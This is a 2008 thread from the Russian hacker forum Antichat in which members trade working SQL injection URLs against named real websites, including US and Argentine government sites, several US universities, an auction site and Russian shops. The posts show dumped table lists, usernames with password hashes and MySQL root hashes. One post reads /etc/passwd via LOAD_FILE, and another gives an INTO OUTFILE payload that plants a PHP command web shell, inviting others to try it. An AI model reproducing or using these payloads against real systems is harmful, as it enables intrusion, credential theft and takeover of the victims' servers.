Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
16.07.2008, 21:27
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Mbda.gov - PR 8
http://www.mbda.gov/index.php?action=faq&id=999999%2527+union+select+u nhex(hex(version()))/*&mode=viewfaq
помогите разкурить..)
Ltgov.state.tx.us - PR 6
http://www.ltgov.state.tx.us/prview.php?id=191'+union+select+1,table_name,3,4,5 ,6,7,8,9+from+information_schema.tables+limit+47,1/*
Tangodata.gov.ar - PR 5
http://www.tangodata.gov.ar/home_noticias_listado.php?id=99999999+union+select +1,version(),3,4,5,6,7/*
Ingushetiya.ru - Ингушетия.ру - PR 5
http://www.ingushetiya.ru/dictionary/?text=-63'+union+select+table_name,table_schema+from+info rmation_schema.tables/*
Riocuarto.gov.ar - PR 4
http://www.riocuarto.gov.ar/institucional.php?id=99999+union+select+1,version( ),3,4,5,6/*
http://www.riocuarto.gov.ar/institucional.php?id=99999+union+select+1,concat_w s(0x3a,user,password),3,4,5,6+from+mysql.user/*
root: 5b3f24b703c68ff2
aka PSIH - carthage.edu
http://www.carthage.edu/admissions/life/clubs.cfm?org=-1+union+select+1,2,concat_ws(0x3a,username,passwor d),4,5,6,7,8,9,10,11+from+alumnicollege.auth_user/*
http://www.carthage.edu/admissions/life/clubs.cfm?org=-1+union+select+1,2,concat_ws(0x3a,username,passwor d),4,5,6,7,8,9,10,11+from+alumni.login/*
http://www.carthage.edu/admissions/life/clubs.cfm?org=-1+union+select+1,2,concat_ws(0x3a,username,passwor d),4,5,6,7,8,9,10,11+from+alumniapps.auth_user/*
http://www.carthage.edu/admissions/life/clubs.cfm?org=-1+union+select+1,2,concat_ws(0x3a,username,passwor d),4,5,6,7,8,9,10,11+from+athletics.login/*
http://www.carthage.edu/admissions/life/clubs.cfm?org=-1+union+select+1,2,concat_ws(0x3a,username,passwor d),4,5,6,7,8,9,10,11+from+400apply.login/*
http://www.carthage.edu/admissions/life/clubs.cfm?org=-1+union+select+1,2,concat_ws(0x3a,user_login,user_ pass),4,5,6,7,8,9,10,11+from+110club.wp_users/*
http://www.carthage.edu/admissions/life/clubs.cfm?org=-1+union+select+1,2,concat_ws(0x3a,username,passwor d),4,5,6,7,8,9,10,11+from+ACTapps.applications/*
кароч почти полный доступ к универу)) там еще много колонок с паролями..
Последний раз редактировалось sabe; 17.07.2008 в 07:30..
|
|
|
16.07.2008, 22:12
|
|
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
Провел на форуме:
305110
Репутация:
133
|
|
хм опять какая то бесполезная иньекция )))
sitiodeletras.com
http://www.sitiodeletras.com/mostrar.php?lid=26228
Database Version: 5.0.41-community
Database name: sitiodl_letras
User name: sitiodl_letras@localhost
cодержимое INFORMATION_SCHEMA.tables
Код:
_artistas
1 aid
2 nombre
_canciones
1 lid
2 aid
3 did
4 artista
5 titulo
6 disco
7 letra
8 referencia
9 nick
10 comentarios
11 timestamp
12 activo
table _discos
1 did
2 nombre
badlyrics
1 artista
2 titulo
3 disco
4 timestamp
5 ip
6 referer
7 status
known_as
1 inputname
2 realname
notfound
1 creiterio
2 texto
3 timestamp
4 ip
5 estado
status
1 value
2 descripcion
|
|
|
|
17.07.2008, 15:27
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
http://www.lilyandlotus.com/pages/set.php?id=-1/**/union/**/select/**/0,1,concat(user(),char(0),database(),char(0),versi on()),3,4/*
amandamc_lilly@localhost
amandamc_lilly
4.0.27-standard
Забавная скуль:
http://www.hanyawanita.com/sm.php?id=-1/**/union/**/select/**/user()/*
вывод - в адресной строке через редирект))
hanyawan_userilg@localhost
hanyawan_hwilgdb
4.1.22-standard
http://www.eszapopan.com.mx/mapograma/machotes/sm.php?id=-1/**/union/**/select/**/user(),2,3,4,5,6/*
bioalive_shadow@localhost
4.1.22-standard
bioalive_main
|
|
|
|
17.07.2008, 16:19
|
|
Banned
Регистрация: 19.10.2007
Сообщений: 152
Провел на форуме:
557623
Репутация:
415
|
|
www.kruizmag.ru
http://www.kruizmag.ru/r_card.php?rid=1492+union+select+user(),database() ,3,4,version(),6,7,8,9--
USER(): u51317@10.10.223.216
DATABASE(): u51317_vbp
VERSION(): 5.0.51-log
Таблицы:
adv_descr
article
article_g
article_gt
article_t
banners
boxes
category
category_descr
compr
compr_descr
config
config_g
countries
currency
faq
lang
loadprice
modules
news
news_descr
nopt2prod
noption_descr
noptions
orders
place
prod2cat
product
product_descr
raspisanie
security
send_users
sends
static
static_g
static_gt
static_t
tbanners
vitrina
vitrina_prod
voting
voting_f
|
|
|
|
17.07.2008, 20:38
|
|
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546
Репутация:
1327
|
|
fromthetop.org pr-6
Version() - 5.0.45-community-nt
file_priv = Y
Сервак стоит на винде....
PHP код:
http://www.fromthetop.org/Programs/Performers.cfm?pid=-1+union+select+1,2,load_file(char(67,58,47,98,111,111,116,46,105,110,105)),4,5,6,7+from+mysql.user/*
PHP код:
http://www.fromthetop.org/Programs/Performers.cfm?pid=-1+union+select+1,2,concat(user,char(58),password),4,5,6,7+from+mysql.user/*
root:*CF57A666D82A1A6E307947399943403DD93CF490 (sha1)
|
|
|
|
17.07.2008, 21:03
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Choices.edu - PR 6
http://www.choices.edu/resources/detail.php?id=-187+union+select+1,unhex(hex(version())),3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26/*
Coastal.edu - PR 5
http://www.coastal.edu/news/story.php?id=1994+union+select+1,version(),3,4,5,6 ,7,8,9,10,11/*
4.. но )
http://www.coastal.edu/news/story.php?id=1994+union+select+1,concat_ws(0x3a,us ername,password),3,4,5,6,7,8,9,10,11+from+users/*
rmatthe: 363b122c528f54df4a0446b6bab05515 < j
http://www.coastal.edu/news/story.php?id=1994+union+select+1,concat_ws(0x3a,us er,password),3,4,5,6,7,8,9,10,11+from+mysql.user/*
root: *70994C59F06C06BC6D7AE8284D7B3A0A707F8D67
http://www.coastal.edu/news/story.php?id=1994+union+select+1,concat_ws(0x3a,db ),3,4,5,6,7,8,9,10,11+from+mysql.db+limit+1,1/*
смотрим бд..
http://www.coastal.edu/news/story.php?id=1994+union+select+1,LOAD_FILE(0x2F657 4632F706173737764),3,4,5,6,7,8,9,10,11/*
ктот попробуйте залить шелл..) ато я убегаю..... чтот тип этого:
http://www.coastal.edu/news/story.php?id=1994+union+select+1,'<?php system($_GET['cmd']);?>',3,4,5,6,7,8,9,10,11+from+mysql.user+into+out file+'/vol2/apache/htdocs/news/vital.php'/*
Irhe.upenn.edu - PR 5
http://www.irhe.upenn.edu/ExpertsDt.php?Id=-1+union+select+table_name,table_schema,user(),vers ion(),0xa920564954414c+from+information_schema.tab les/*
Apps.sais-jhu.edu
http://apps.sais-jhu.edu/faculty_bios/faculty_bio1.php?ID=-61+union+select+1,2,3,4,version(),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24/*
Последний раз редактировалось sabe; 17.07.2008 в 22:01..
|
|
|
|
18.07.2008, 03:00
|
|
Участник форума
Регистрация: 01.03.2006
Сообщений: 169
Провел на форуме:
519496
Репутация:
78
|
|
auction.ua
http://auction.ua/sellitem/rpc.php?o=1957+union+select+1,concat(username,char (58),password),3+from+probid_admins/*
auctionua:4c527675e9130ae3a6f0eea1fd9acfe5
http://auction.ua/sellitem/rpc.php?o=1957+union+select+1,concat(username,char (58),password),3+from+probid_users/*
|
|
|
|
18.07.2008, 13:18
|
|
Участник форума
Регистрация: 16.06.2006
Сообщений: 179
Провел на форуме:
515368
Репутация:
135
|
|
Код:
http://www.f1-world.ru/news/news.php3?idnews=-807061930+union+select+1,TABLE_NAME,3,4,5,6,7,8,9,10,11%20from%20INFORMATION_SCHEMA.TABLES%20limit%2052,1/*
если не лень то можете продолжить
вот те таблицы, которые я подобрал.
Код:
CHARACTER_SETS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
1
2
3
4
a_settings
articles
cards
cmess
cusrs
drvinfo
drvyears
fusers
g10qwe
g10users
g12qwe
g12teams
g12users
g15_parts
g15_teams
g20sessions
g20users
g20vopros
g20vopros_old
g21drivers
g21sessions
g21users
images
imagesections
img2003
messages
mg_news
news
news2001_2007
res2004
res2004m
res2004com
res2004drv
самое интересно, что от сайта есть электронный магаз
http://www.mirf1.ru/
на котором тож имеется дырочка
Код:
http://www.mirf1.ru/prview.php3?lnk=61&idp=1167'
version() - 5.0.24
user() - f1world_rw@localhost
database() - f1world |
|
|
|
18.07.2008, 18:50
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
CCC.uga.edu - PR 5
http://www.ccc.uga.edu/member_page.php?id=-8+union+select+1,2,3,4,version(),user(),database() ,8,9,0,11,12,13,14/*
4.0.16
Monitor-nhsft.gov.uk - PR 5
http://www.monitor-nhsft.gov.uk/publications.php?id=-726+union+select+1,table_name,table_schema,4,5,6,7 ,8,9,0,11,12,13,14,15,16,17,18,19+from+information _schema.tables+limit+23,1--
нече интересного в БД не нашел..
Последний раз редактировалось sabe; 18.07.2008 в 18:52..
|
|
|
|
18.07.2008, 20:58
|
|
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838
Репутация:
770
|
|
http://tehno.allmoskow.ru/site.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24--
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
